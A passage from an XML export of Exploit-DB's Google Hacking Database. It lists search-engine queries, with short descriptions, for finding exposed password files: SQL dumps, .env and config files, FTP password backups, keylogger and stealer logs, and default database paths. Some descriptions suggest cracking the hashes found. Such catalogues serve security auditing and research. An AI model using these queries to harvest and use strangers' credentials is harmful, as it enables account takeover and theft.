<querystring>https://www.google.com/search?num=100&amp;q=%22index+of%2F%22+%22ws_ftp.ini%22+%22parent+directory%22</querystring>
<edb></edb>
<date>2004-09-17</date>
<author>anonymous</author>
</entry>
<entry>
<id>4425</id>
<link>https://www.exploit-db.com/ghdb/4425</link>
<category>Files Containing Passwords</category>
<shortDescription>&quot;INSERT INTO phpbb_users&quot; ext:sql</shortDescription>
<textualDescription>Finds files with usernames and hashed passwords!
Dxtroyer</textualDescription>
<query>&quot;INSERT INTO phpbb_users&quot; ext:sql</query>
<querystring>https://www.google.com/search?q=&quot;INSERT INTO phpbb_users&quot; ext:sql</querystring>
<edb></edb>
<date>2017-04-12</date>
<author>Dxtroyer</author>
</entry>
<entry>
<id>6765</id>
<link>https://www.exploit-db.com/ghdb/6765</link>
<category>Files Containing Passwords</category>
<shortDescription>&quot;insert into users&quot; &quot;VALUES&quot; ext:sql | ext:txt | ext:log | ext:env</shortDescription>
<textualDescription># Google Dork: &quot;insert into users&quot; &quot;VALUES&quot; ext:sql | ext:txt | ext:log | ext:env
# Sensitive directories containing usernames, passwords and more...
# Date: 21/1/2021
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>&quot;insert into users&quot; &quot;VALUES&quot; ext:sql | ext:txt | ext:log | ext:env</query>
<querystring>https://www.google.com/search?q=&quot;insert into users&quot; &quot;VALUES&quot; ext:sql | ext:txt | ext:log | ext:env</querystring>
<edb></edb>
<date>2021-01-26</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>4498</id>
<link>https://www.exploit-db.com/ghdb/4498</link>
<category>Files Containing Passwords</category>
<shortDescription>&quot;iSpy Keylogger&quot; &quot;Passwords Log&quot; ext:txt</shortDescription>
<textualDescription>Description: iSpy keylogger logs
Dork: &quot;iSpy Keylogger&quot; &quot;Passwords Log&quot; ext:txt
Author: scumsec</textualDescription>
<query>&quot;iSpy Keylogger&quot; &quot;Passwords Log&quot; ext:txt</query>
<querystring>https://www.google.com/search?q=&quot;iSpy Keylogger&quot; &quot;Passwords Log&quot; ext:txt</querystring>
<edb></edb>
<date>2017-05-29</date>
<author>anonymous</author>
</entry>
<entry>
<id>6712</id>
<link>https://www.exploit-db.com/ghdb/6712</link>
<category>Files Containing Passwords</category>
<shortDescription>&quot;keystorePass=&quot; ext:xml | ext:txt -git -gitlab</shortDescription>
<textualDescription># Google Dork: &quot;keystorePass=&quot; ext:xml | ext:txt -git -gitlab
# Files containing passwords.
# Date: 27/11/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>&quot;keystorePass=&quot; ext:xml | ext:txt -git -gitlab</query>
<querystring>https://www.google.com/search?q=&quot;keystorePass=&quot; ext:xml | ext:txt -git -gitlab</querystring>
<edb></edb>
<date>2020-12-01</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>663</id>
<link>https://www.exploit-db.com/ghdb/663</link>
<category>Files Containing Passwords</category>
<shortDescription>&quot;liveice configuration file&quot; ext:cfg -site:sourceforge.net</shortDescription>
<textualDescription>This finds the liveice.cfg file which contains all configuration data for an Icecast server. Passwords are saved unencrypted in this file.</textualDescription>
<query>&quot;liveice configuration file&quot; ext:cfg -site:sourceforge.net</query>
<querystring>https://www.google.com/search?q=%22liveice+configuration+file%22+ext:cfg+-site:sourceforge.net&amp;c2coff=1&amp;filter=0</querystring>
<edb></edb>
<date>2004-11-08</date>
<author>anonymous</author>
</entry>
<entry>
<id>1408</id>
<link>https://www.exploit-db.com/ghdb/1408</link>
<category>Files Containing Passwords</category>
<shortDescription>&quot;login: *&quot; &quot;password: *&quot; filetype:xls</shortDescription>
<textualDescription>This returns xls files containing login names and passwords. it works by showing all the xls files with password:(something)so a downside is that u do get stuff like &quot;password protected&quot;, &quot;password services&quot; etc. (and the same for login)But...most of the decent ones have the login and password in the text given to you by google, so its easy to seperate the useful ones from the others.</textualDescription>
<query>&quot;login: *&quot; &quot;password= *&quot; filetype:xls</query>
<querystring>https://www.google.com/search?q=%22login%3A+*%22+%22password%3A+*%22+filetype%3Axls</querystring>
<edb></edb>
<date>2006-09-06</date>
<author>anonymous</author>
</entry>
<entry>
<id>6727</id>
<link>https://www.exploit-db.com/ghdb/6727</link>
<category>Files Containing Passwords</category>
<shortDescription>&quot;mailer_password:&quot; + &quot;mailer_host:&quot; + &quot;mailer_user:&quot; + &quot;secret:&quot; ext:yml</shortDescription>
<textualDescription># Google Dork: &quot;mailer_password:&quot; + &quot;mailer_host:&quot; + &quot;mailer_user:&quot; + &quot;secret:&quot; ext:yml
# Files containing email username and password and more...
# Date: 10/12/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>&quot;mailer_password:&quot; + &quot;mailer_host:&quot; + &quot;mailer_user:&quot; + &quot;secret:&quot; ext:yml</query>
<querystring>https://www.google.com/search?q=&quot;mailer_password:&quot; + &quot;mailer_host:&quot; + &quot;mailer_user:&quot; + &quot;secret:&quot; ext:yml</querystring>
<edb></edb>
<date>2020-12-11</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>4685</id>
<link>https://www.exploit-db.com/ghdb/4685</link>
<category>Files Containing Passwords</category>
<shortDescription>&quot;MAIL_PASSWORD&quot; filetype:env</shortDescription>
<textualDescription>*Google* dork *description: *mail credentials ( db credentials) for mostly
laravel websites
*Google Search:* &quot;MAIL_PASSWORD&quot; filetype:env
*Submitted by:* Alfie
*Website: (*https://the-infosec.com*)*</textualDescription>
<query>&quot;MAIL_PASSWORD&quot; filetype:env</query>
<querystring>https://www.google.com/search?q=&quot;MAIL_PASSWORD&quot; filetype:env</querystring>
<edb></edb>
<date>2018-03-02</date>
<author>Alfie</author>
</entry>
<entry>
<id>5952</id>
<link>https://www.exploit-db.com/ghdb/5952</link>
<category>Files Containing Passwords</category>
<shortDescription>&quot;MasterUserPassword&quot; ext:cfg OR ext:log OR ext:txt -git</shortDescription>
<textualDescription># Google Dork: &quot;MasterUserPassword&quot; ext:cfg OR ext:log OR ext:txt -git
# By using this dork some exposed master user passwords can be found.
# Date: 27/04/2020
# Author: Alexandros Pappas
</textualDescription>
<query>&quot;MasterUserPassword&quot; ext:cfg OR ext:log OR ext:txt -git</query>
<querystring>https://www.google.com/search?q=&quot;MasterUserPassword&quot; ext:cfg OR ext:log OR ext:txt -git</querystring>
<edb></edb>
<date>2020-04-27</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>3760</id>
<link>https://www.exploit-db.com/ghdb/3760</link>
<category>Files Containing Passwords</category>
<shortDescription>&quot;My RoboForm Data&quot; &quot;index of&quot;</shortDescription>
<textualDescription>This dork looks for Roboform password files. Author: Robert McCurdy
</textualDescription>
<query>&quot;My RoboForm Data&quot; &quot;index of&quot;</query>
<querystring>https://www.google.com/search?q=&quot;My RoboForm Data&quot; &quot;index of&quot;</querystring>
<edb></edb>
<date>2011-12-12</date>
<author>anonymous</author>
</entry>
<entry>
<id>4502</id>
<link>https://www.exploit-db.com/ghdb/4502</link>
<category>Files Containing Passwords</category>
<shortDescription>&quot;mysqli_connect&quot; ext:inc</shortDescription>
<textualDescription>Finds scripts containing MySQL usernames and passwords
Dxtroyer</textualDescription>
<query>&quot;mysqli_connect&quot; ext:inc</query>
<querystring>https://www.google.com/search?q=&quot;mysqli_connect&quot; ext:inc</querystring>
<edb></edb>
<date>2017-05-29</date>
<author>anonymous</author>
</entry>
<entry>
<id>6310</id>
<link>https://www.exploit-db.com/ghdb/6310</link>
<category>Files Containing Passwords</category>
<shortDescription>&quot;MYSQL_ROOT_PASSWORD:&quot; ext:env OR ext:yml -git</shortDescription>
<textualDescription># Google Dork: &quot;MYSQL_ROOT_PASSWORD:&quot; ext:env OR ext:yml -git
# Juicy information and sensitive directories including user names and passwords.
# Date: 18/06/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>&quot;MYSQL_ROOT_PASSWORD:&quot; ext:env OR ext:yml -git</query>
<querystring>https://www.google.com/search?q=&quot;MYSQL_ROOT_PASSWORD:&quot; ext:env OR ext:yml -git</querystring>
<edb></edb>
<date>2020-06-18</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>1212</id>
<link>https://www.exploit-db.com/ghdb/1212</link>
<category>Files Containing Passwords</category>
<shortDescription>&quot;parent directory&quot; +proftpdpasswd</shortDescription>
<textualDescription>User names and password hashes from web server backups generated by cpanel for ProFTPd. Password hashes can be cracked, granting direct access to FTP accounts. Unix passwd and shadow files can sometimes be found with this query as well.</textualDescription>
<query>&quot;parent directory&quot; +proftpdpasswd</query>
<querystring>https://www.google.com/search?q=%22parent+directory%22+%2Bproftpdpasswd&amp;btnG=Google+Search</querystring>
<edb></edb>
<date>2005-11-30</date>
<author>anonymous</author>
</entry>
<entry>
<id>3813</id>
<link>https://www.exploit-db.com/ghdb/3813</link>
<category>Files Containing Passwords</category>
<shortDescription>&quot;parent directory&quot; proftpdpasswd intitle:&quot;index of&quot; -google</shortDescription>
<textualDescription>This dork is based on this: https://www.exploit-db.com/ghdb/1212/
but improved cause that is useless, instead of this:
&quot;parent directory&quot; proftpdpasswd intitle:&quot;index of&quot; -google
Best regards,
Nemesis</textualDescription>
<query>&quot;parent directory&quot; proftpdpasswd intitle:&quot;index of&quot; -google</query>
<querystring>https://www.google.com/search?q=&quot;parent directory&quot; proftpdpasswd intitle:&quot;index of&quot; -google</querystring>
<edb></edb>
<date>2012-11-02</date>
<author>anonymous</author>
</entry>
<entry>
<id>5426</id>
<link>https://www.exploit-db.com/ghdb/5426</link>
<category>Files Containing Passwords</category>
<shortDescription>&quot;pass&quot; &quot;usuario&quot; filetype:sql</shortDescription>
<textualDescription>Leak user and password (hashed) in sql files
&quot;usuario&quot; &quot;clave&quot; filetype:sql
&quot;usuario&quot; &quot;pass&quot; filetype:sql
&quot;usuario&quot; &quot;pwd&quot; filetype:sql
&quot;pass&quot; &quot;correo&quot; filetype:sql -github.com</textualDescription>
<query>&quot;pass&quot; &quot;usuario&quot; filetype:sql</query>
<querystring>https://www.google.com/search?q=&quot;pass&quot; &quot;usuario&quot; filetype:sql</querystring>
<edb></edb>
<date>2019-08-21</date>
<author>The Dexter</author>
</entry>
<entry>
<id>6760</id>
<link>https://www.exploit-db.com/ghdb/6760</link>
<category>Files Containing Passwords</category>
<shortDescription>&quot;password 7&quot; ext:txt | ext:log | ext:cfg</shortDescription>
<textualDescription># Google Dork: &quot;password 7&quot; ext:txt | ext:log | ext:cfg
# Files containing passwords.
# Date: 21/1/2021
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>&quot;password 7&quot; ext:txt | ext:log | ext:cfg</query>
<querystring>https://www.google.com/search?q=&quot;password 7&quot; ext:txt | ext:log | ext:cfg</querystring>
<edb></edb>
<date>2021-01-22</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>4644</id>
<link>https://www.exploit-db.com/ghdb/4644</link>
<category>Files Containing Passwords</category>
<shortDescription>&quot;password&quot; + ext:conf &quot;Modem Type = USB Modem&quot;</shortDescription>
<textualDescription>Google Dork: Files Containing Passwords
Huijun Chen
</textualDescription>
<query>&quot;password&quot; + ext:conf &quot;Modem Type = USB Modem&quot;</query>
<querystring>https://www.google.com/search?q=&quot;password&quot; + ext:conf &quot;Modem Type = USB Modem&quot;</querystring>
<edb></edb>
<date>2018-01-01</date>
<author>Huijun Chen</author>
</entry>
<entry>
<id>4857</id>
<link>https://www.exploit-db.com/ghdb/4857</link>
<category>Files Containing Passwords</category>
<shortDescription>&quot;password.xlsx&quot; ext:xlsx</shortDescription>
<textualDescription>&quot;password.xlsx&quot; ext:xlsx
excel files containing password
ManhNho
</textualDescription>
<query>&quot;password.xlsx&quot; ext:xlsx</query>
<querystring>https://www.google.com/search?q=&quot;password.xlsx&quot; ext:xlsx</querystring>
<edb></edb>
<date>2018-06-14</date>
<author>ManhNho</author>
</entry>
<entry>
<id>4178</id>
<link>https://www.exploit-db.com/ghdb/4178</link>
<category>Files Containing Passwords</category>
<shortDescription>&quot;Password=&quot; inurl:web.config -intext:web.config ext:config</shortDescription>
<textualDescription>This Dork show Passwords of web.config files.
Enjoy them!.
Dork by Rootkit Pentester.</textualDescription>
<query>&quot;Password=&quot; inurl:web.config -intext:web.config ext:config</query>
<querystring>https://www.google.com/search?q=&quot;Password=&quot; inurl:web.config -intext:web.config ext:config</querystring>
<edb></edb>
<date>2016-01-07</date>
<author>anonymous</author>
</entry>
<entry>
<id>6541</id>
<link>https://www.exploit-db.com/ghdb/6541</link>
<category>Files Containing Passwords</category>
<shortDescription>&quot;POSTGRES_PASSWORD=&quot; ext:txt | ext:cfg | ext:env | ext:ini | ext:yml | ext:sql -git -gitlab</shortDescription>
<textualDescription># Google Dork: &quot;POSTGRES_PASSWORD=&quot; ext:txt | ext:cfg | ext:env | ext:ini | ext:yml | ext:sql -git -gitlab
# Exposed passwords.
# Date: 15/09/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>&quot;POSTGRES_PASSWORD=&quot; ext:txt | ext:cfg | ext:env | ext:ini | ext:yml | ext:sql -git -gitlab</query>
<querystring>https://www.google.com/search?q=&quot;POSTGRES_PASSWORD=&quot; ext:txt | ext:cfg | ext:env | ext:ini | ext:yml | ext:sql -git -gitlab</querystring>
<edb></edb>
<date>2020-09-15</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>701</id>
<link>https://www.exploit-db.com/ghdb/701</link>
<category>Files Containing Passwords</category>
<shortDescription>&quot;powered by ducalendar&quot; -site:duware.com</shortDescription>
<textualDescription>Most duware products use Microsoft Access databases in default locations without instructing the users to change them. The plain text admin passwords are just a click away for any attacker who knows how to type an URL. For Ducalendar it's: /ducalendar/_private/ducalendar.mdb</textualDescription>
<query>&quot;powered by ducalendar&quot; -site:duware.com</query>
<querystring>https://www.google.com/search?num=100&amp;q=%22powered+by+ducalendar%22+-site%3Aduware.com</querystring>
<edb></edb>
<date>2004-11-23</date>
<author>anonymous</author>
</entry>
<entry>
<id>702</id>
<link>https://www.exploit-db.com/ghdb/702</link>
<category>Files Containing Passwords</category>
<shortDescription>&quot;Powered by Duclassified&quot; -site:duware.com</shortDescription>
<textualDescription>Most duware products use Microsoft Access databases in default locations without instructing the users to change them. The plain text admin passwords are just a click away for any attacker who knows how to type an URL. For Duclassified it's: /duclassified/_private/duclassified.mdb</textualDescription>
<query>&quot;Powered by Duclassified&quot; -site:duware.com</query>
<querystring>https://www.google.com/search?num=100&amp;q=%22Powered+by+Duclassified%22+-site%3Aduware.com</querystring>
<edb></edb>
<date>2004-11-23</date>
<author>anonymous</author>
</entry>
<entry>
<id>704</id>
<link>https://www.exploit-db.com/ghdb/704</link>
<category>Files Containing Passwords</category>
<shortDescription>&quot;Powered by Duclassified&quot; -site:duware.com &quot;DUware All Rights reserved&quot;</shortDescription>
<textualDescription>Most duware products use Microsoft Access databases in default locations without instructing the users to change them. The plain text admin passwords are just a click away for any attacker who knows how to type an URL. For Duclassified it's: /duclassified/_private/duclassified.mdb</textualDescription>
<query>&quot;Powered by Duclassified&quot; -site:duware.com &quot;DUware All Rights reserved&quot;</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;c2coff=1&amp;q=%22Powered+by+Duclassified%22+-site%3Aduware.com+%22DUware+All+Rights+Reserved%22</querystring>
<edb></edb>
<date>2004-11-23</date>
<author>anonymous</author>
</entry>
<entry>
<id>705</id>
<link>https://www.exploit-db.com/ghdb/705</link>
<category>Files Containing Passwords</category>
<shortDescription>&quot;powered by duclassmate&quot; -site:duware.com</shortDescription>
<textualDescription>Most duware products use Microsoft Access databases in default locations without instructing the users to change them. The plain text admin passwords are just a click away for any attacker who knows how to type an URL. For Duclassmate it's: /duclassmate/_private/duclassmate.mdb</textualDescription>
<query>&quot;powered by duclassmate&quot; -site:duware.com</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;c2coff=1&amp;q=%22powered+by+duclassmate%22+-site%3Aduware.com</querystring>
<edb></edb>
<date>2004-11-23</date>
<author>anonymous</author>
</entry>
<entry>
<id>703</id>
<link>https://www.exploit-db.com/ghdb/703</link>
<category>Files Containing Passwords</category>
<shortDescription>&quot;Powered by Dudirectory&quot; -site:duware.com</shortDescription>
<textualDescription>Most duware products use Microsoft Access databases in default locations without instructing the users to change them. The plain text admin passwords are just a click away for any attacker who knows how to type an URL. For DuDirectory it's: /dudirectory/_private/dudirectory.mdb</textualDescription>
<query>&quot;Powered by Dudirectory&quot; -site:duware.com</query>
<querystring>https://www.google.com/search?num=100&amp;&amp;q=%22Powered+by+Dudirectory%22+-site%3Aduware.com</querystring>
<edb></edb>
<date>2004-11-23</date>
<author>anonymous</author>
</entry>
<entry>
<id>707</id>
<link>https://www.exploit-db.com/ghdb/707</link>
<category>Files Containing Passwords</category>
<shortDescription>&quot;powered by dudownload&quot; -site:duware.com</shortDescription>
<textualDescription>Most duware products use Microsoft Access databases in default locations without instructing the users to change them. The plain text admin passwords are just a click away for any attacker who knows how to type an URL. rename ../xxx to ../_private/dudownload.mdb</textualDescription>
<query>&quot;powered by dudownload&quot; -site:duware.com</query>
<querystring>https://www.google.com/search?num=100&amp;q=%22powered+by+dudownload%22+-site%3Aduware.com</querystring>
<edb></edb>
<date>2004-11-23</date>
<author>anonymous</author>
</entry>
<entry>
<id>508</id>
<link>https://www.exploit-db.com/ghdb/508</link>
<category>Files Containing Passwords</category>
<shortDescription>&quot;Powered By Elite Forum Version *.*&quot;</shortDescription>
<textualDescription>Elite forums is one of those Microsoft Access .mdb file based forums. This one is particularly dangerous, because the filename and path are hardcoded in the software. An attacker can modify index.php for ./data/users/userdb.dat, open the file and see something like this:42administrat4571XXX367b52XXXb33b6ce74df1e0170(data was xx'd)These are MD5 digests and can be brute forced (with enough time) or dictionary cracked by a malicious user, thus giving adminstrator access to the forum.</textualDescription>
<query>&quot;Powered By Elite Forum Version *.*&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+By+Elite+Forum+Version+*.*%22</querystring>
<edb></edb>
<date>2004-09-24</date>
<author>anonymous</author>
</entry>
<entry>
<id>863</id>
<link>https://www.exploit-db.com/ghdb/863</link>
<category>Files Containing Passwords</category>
<shortDescription>&quot;Powered by Link Department&quot;</shortDescription>
<textualDescription>Link management script with advanced yet easy to use admin control panel, fully template driven appearance, static HTML front-end and email notifications.Below the link list a folder 'ld' exists which contains various juicy information like encrypted admin passwords and session data.</textualDescription>
<query>&quot;Powered by Link Department&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+Link+Department%22</querystring>
<edb></edb>
<date>2005-02-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>6809</id>
<link>https://www.exploit-db.com/ghdb/6809</link>
<category>Files Containing Passwords</category>
<shortDescription>&quot;public $user =&quot; | &quot;public $password = &quot; | &quot;public $secret =&quot; | &quot;public $db =&quot; ext:txt | ext:log -git</shortDescription>
<textualDescription># Google Dork: &quot;public $user =&quot; | &quot;public $password = &quot; | &quot;public $secret =&quot; | &quot;public $db =&quot; ext:txt | ext:log -git
# Files containing usernames and passwords and more...
# Date: 23/2/2021
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>&quot;public $user =&quot; | &quot;public $password = &quot; | &quot;public $secret =&quot; | &quot;public $db =&quot; ext:txt | ext:log -git</query>
<querystring>https://www.google.com/search?q=&quot;public $user =&quot; | &quot;public $password = &quot; | &quot;public $secret =&quot; | &quot;public $db =&quot; ext:txt | ext:log -git</querystring>
<edb></edb>
<date>2021-02-25</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>4510</id>
<link>https://www.exploit-db.com/ghdb/4510</link>
<category>Files Containing Passwords</category>
<shortDescription>&quot;resources.db.params.password&quot; ext:ini -git</shortDescription>
<textualDescription>Finds lots of database usernames &amp; passwords!
Dxtroyer</textualDescription>
<query>&quot;resources.db.params.password&quot; ext:ini -git</query>
<querystring>https://www.google.com/search?q=&quot;resources.db.params.password&quot; ext:ini -git</querystring>
<edb></edb>
<date>2017-06-05</date>
<author>anonymous</author>
</entry>
<entry>
<id>6597</id>
<link>https://www.exploit-db.com/ghdb/6597</link>
<category>Files Containing Passwords</category>
<shortDescription>&quot;server.cfg&quot; ext:cfg intext:&quot;rcon_password&quot; -git -gitlab</shortDescription>
<textualDescription># Google Dork: &quot;server.cfg&quot; ext:cfg intext:&quot;rcon_password&quot; -git -gitlab
# Exposed passwords found in server.cfg files.
# Date: 7/10/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>&quot;server.cfg&quot; ext:cfg intext:&quot;rcon_password&quot; -git -gitlab</query>
<querystring>https://www.google.com/search?q=&quot;server.cfg&quot; ext:cfg intext:&quot;rcon_password&quot; -git -gitlab</querystring>
<edb></edb>
<date>2020-10-07</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>344</id>
<link>https://www.exploit-db.com/ghdb/344</link>
<category>Files Containing Passwords</category>
<shortDescription>&quot;sets mode: +k&quot;</shortDescription>
<textualDescription>This search reveals channel keys (passwords) on IRC as revealed from IRC chat logs.</textualDescription>
<query>&quot;sets mode: +k&quot;</query>
<querystring>https://www.google.com/search?q=%22sets+mode:+%2Bk%22&amp;oe=UTF-8</querystring>
<edb></edb>
<date>2004-07-19</date>
<author>anonymous</author>
</entry>
<entry>
<id>6631</id>
<link>https://www.exploit-db.com/ghdb/6631</link>
<category>Files Containing Passwords</category>
<shortDescription>&quot;spring.datasource.password=&quot; + &quot;spring.datasource.username=&quot; ext:properties -git -gitlab</shortDescription>
<textualDescription># Google Dork: &quot;spring.datasource.password=&quot; +
&quot;spring.datasource.username=&quot; ext:properties -git -gitlab
# Files containing usernames and passwords.
# Date: 11/10/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>&quot;spring.datasource.password=&quot; + &quot;spring.datasource.username=&quot; ext:properties -git -gitlab</query>
<querystring>https://www.google.com/search?q=&quot;spring.datasource.password=&quot; + &quot;spring.datasource.username=&quot; ext:properties -git -gitlab</querystring>
<edb></edb>
<date>2020-10-21</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>4477</id>
<link>https://www.exploit-db.com/ghdb/4477</link>
<category>Files Containing Passwords</category>
<shortDescription>&quot;Stealer by W33DY&quot; ext:txt</shortDescription>
<textualDescription>Finds stealer logs with usernames, passwords and sites to input them!
Dxtroyer</textualDescription>
<query>&quot;Stealer by W33DY&quot; ext:txt</query>
<querystring>https://www.google.com/search?q=&quot;Stealer by W33DY&quot; ext:txt</querystring>
<edb></edb>
<date>2017-05-10</date>
<author>anonymous</author>
</entry>
<entry>
<id>5936</id>
<link>https://www.exploit-db.com/ghdb/5936</link>
<category>Files Containing Passwords</category>
<shortDescription>&quot;super password level 3 cipher&quot; ext:txt OR ext:log</shortDescription>
<textualDescription># Google Dork: &quot;super password level 3 cipher&quot; ext:txt OR ext:log
# Configuration files containing usernames and passwords.
# Date: 22/04/2020
# Author: Alexandros Pappas
</textualDescription>
<query>&quot;super password level 3 cipher&quot; ext:txt OR ext:log</query>
<querystring>https://www.google.com/search?q=&quot;super password level 3 cipher&quot; ext:txt OR ext:log</querystring>
<edb></edb>
<date>2020-04-22</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>4921</id>
<link>https://www.exploit-db.com/ghdb/4921</link>
<category>Files Containing Passwords</category>
<shortDescription>&quot;whoops! there was an error.&quot; &quot;db_password&quot;</shortDescription>
<textualDescription>Dork with lots of passwords!.
Dork discover by Rootkit Pentester.
</textualDescription>
<query>&quot;whoops! there was an error.&quot; &quot;db_password&quot;</query>
<querystring>https://www.google.com/search?q=&quot;whoops! there was an error.&quot; &quot;db_password&quot;</querystring>
<edb></edb>
<date>2018-08-14</date>
<author>Rootkit_Pentester</author>
</entry>
<entry>
<id>4405</id>
<link>https://www.exploit-db.com/ghdb/4405</link>
<category>Files Containing Passwords</category>
<shortDescription>&quot;your default password is&quot; filetype:pdf</shortDescription>
<textualDescription>&quot;your default password is&quot; filetype:pdf
*Richard De Vere*
*Principal Consultant*
*Web:* TheAntiSocialEngineer.com
*Twitter:* @AntiSocial_Eng</textualDescription>
<query>&quot;your default password is&quot; filetype:pdf</query>
<querystring>https://www.google.com/search?q=&quot;your default password is&quot; filetype:pdf</querystring>
<edb></edb>
<date>2017-03-02</date>
<author>anonymous</author>
</entry>
<entry>
<id>1131</id>
<link>https://www.exploit-db.com/ghdb/1131</link>
<category>Files Containing Passwords</category>
<shortDescription>&quot;your password is&quot; filetype:log</shortDescription>
<textualDescription>This search finds log files containing the phrase (Your password is). These files often contain plaintext passwords, although YMMV.</textualDescription>
<query>&quot;your password is&quot; filetype:log</query>
<querystring>https://www.google.com/search?q=%22your+password+is%22+filetype%3Alog</querystring>
<edb></edb>
<date>2005-09-24</date>
<author>anonymous</author>
</entry>
<entry>
<id>4457</id>
<link>https://www.exploit-db.com/ghdb/4457</link>
<category>Files Containing Passwords</category>
<shortDescription>&quot;[main]&quot; &quot;enc_GroupPwd=&quot; ext:txt</shortDescription>
<textualDescription>Finds Cisco VPN client passwords (encrypted, but easily cracked!)
Dxtroyer</textualDescription>
<query>&quot;[main]&quot; &quot;enc_GroupPwd=&quot; ext:txt</query>
<querystring>https://www.google.com/search?q=&quot;[main]&quot; &quot;enc_GroupPwd=&quot; ext:txt</querystring>
<edb></edb>
<date>2017-05-03</date>
<author>Dxtroyer</author>
</entry>
<entry>
<id>859</id>
<link>https://www.exploit-db.com/ghdb/859</link>
<category>Files Containing Passwords</category>
<shortDescription>&amp;quot;Powered by DUpaypal&amp;quot; -site:duware.com</shortDescription>
<textualDescription>Here is another DUware product, DUpaypal. Once you get hold of the database it contains the admin username and password. The default by the way is admin/passwordThe default location for the database is ../_private/DUpaypal.mdb</textualDescription>
<query>&quot;Powered by DUpaypal&quot; -site:duware.com</query>
<querystring>https://www.google.com/search?q=%22Powered+by+DUpaypal%22+-site%3Aduware.com&amp;c2coff=1</querystring>
<edb></edb>
<date>2005-02-07</date>
<author>anonymous</author>
</entry>
<entry>
<id>3770</id>
<link>https://www.exploit-db.com/ghdb/3770</link>
<category>Files Containing Passwords</category>
<shortDescription>(username=* | username:* |) | ( ((password=* | password:*) | (passwd=* | passwd:*) | (credentials=* | credentials:*)) | ((hash=* | hash:*) | (md5:* | md5=*)) | (inurl:auth | inurl:passwd | inurl:pass) ) filetype:log</shortDescription>
<textualDescription>Logged username, passwords, hashes
Author: GhOsT-PR</textualDescription>
<query>(username=* | username:* |) | ( ((password=* | password:*) | (passwd=* | passwd:*) | (credentials=* | credentials:*)) | ((hash=* | hash:*) | (md5:* | md5=*)) | (inurl:auth | inurl:passwd | inurl:pass) ) filetype:log</query>
<querystring>https://www.google.com/search?q=(username=* | username:* |) | ( ((password=* | password:*) | (passwd=* | passwd:*) | (credentials=* | credentials:*)) | ((hash=* | hash:*) | (md5:* | md5=*)) | (inurl:auth | inurl:passwd | inurl:pass) ) filetype:log</querystring>
<edb></edb>
<date>2011-12-27</date>
<author>anonymous</author>
</entry>
<entry>
<id>4961</id>
<link>https://www.exploit-db.com/ghdb/4961</link>
<category>Files Containing Passwords</category>
<shortDescription>/_wpeprivate/config.json</shortDescription>
<textualDescription>file containing password ;)
ManhNho
</textualDescription>
<query>/_wpeprivate/config.json</query>
<querystring>https://www.google.com/search?q=/_wpeprivate/config.json</querystring>
<edb></edb>
<date>2018-09-21</date>
<author>ManhNho</author>
</entry>
<entry>
<id>7865</id>
<link>https://www.exploit-db.com/ghdb/7865</link>
<category>Files Containing Passwords</category>
<shortDescription>=?UTF-8?Q?intitle:&quot;Index_of=E2=80=9D_pwd.db?=</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Index of” pwd.db
# Files Containing Passwords
# Date: 02/12/2021
# Exploit Author: Muhammad Al-Amin
</textualDescription>
<query>intitle:&quot;Index of&quot; pwd.db</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Index of&quot; pwd.db</querystring>
<edb></edb>
<date>2022-06-15</date>
<author>Muhammad Al-Amin</author>
</entry>
<entry>
<id>7530</id>
<link>https://www.exploit-db.com/ghdb/7530</link>
<category>Files Containing Passwords</category>
<shortDescription>=?UTF-8?Q?inurl:/wp-content/uploads/_ext:txt_&quot;?= =?UTF-8?Q?username&quot;_|_=E2=80=9Cuser_?= =?UTF-8?Q?name=E2=80=9D_|_=E2=80=9Cuname=E2=80=9D_|_?= =?UTF-8?Q?=E2=80=9Cuser=E2=80=9D_|_=E2=80=9Cuserid=E2=80=9D_?= =?UTF-8?Q?|_=E2=80=9Cuser_id=E2=80=9D_AND_&quot;p?= =?</shortDescription>
<textualDescription># Google Dork: inurl:/wp-content/uploads/ ext:txt &quot;username&quot; | “user name” | “uname” | “user” | “userid” | “user id” AND &quot;password&quot; | “pass word” | &quot;pwd&quot; | &quot;pw&quot;
# Files Containing Passwords
# Date:29/10/2021
# Exploit Author: Aftab Alam</textualDescription>
<query>inurl:/wp-content/uploads/ ext:txt &quot;username&quot; | &quot;user name&quot; | &quot;uname&quot; | &quot;user&quot; | &quot;userid&quot; | &quot;user id&quot; AND &quot;password&quot; | &quot;pass word&quot; | &quot;pwd&quot; | &quot;pw&quot;</query>
<querystring>https://www.google.com/search?q=inurl:/wp-content/uploads/ ext:txt &quot;username&quot; | &quot;user name&quot; | &quot;uname&quot; | &quot;user&quot; | &quot;userid&quot; | &quot;user id&quot; AND &quot;password&quot; | &quot;pass word&quot; | &quot;pwd&quot; | &quot;pw&quot;</querystring>
<edb></edb>
<date>2021-10-29</date>
<author>Aftab Alam</author>
</entry>
<entry>
<id>6968</id>
<link>https://www.exploit-db.com/ghdb/6968</link>
<category>Files Containing Passwords</category>
<shortDescription>allintext:&quot;*.@gmail.com&quot; OR &quot;password&quot; OR &quot;username&quot; filetype:xlsx</shortDescription>
